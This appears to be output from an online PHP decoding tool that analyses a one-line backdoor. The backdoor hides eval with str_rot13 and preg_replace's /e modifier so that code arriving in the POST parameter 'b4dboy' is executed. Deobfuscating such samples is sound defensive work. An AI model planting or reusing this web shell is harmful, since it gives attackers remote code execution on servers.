Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php ($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4db..
Decoded Output download
<?php
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
?>
Did this file decode correctly?
Original Code
<?php
($b4dboy = $_POST['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');
?>
Function Calls
| str_rot13 | 1 |
| preg_replace | 1 |
Stats
| MD5 | c0203e235988d1d5e6af080d1db8ba68 |
| Eval Count | 1 |
| Decode Time | 94 ms |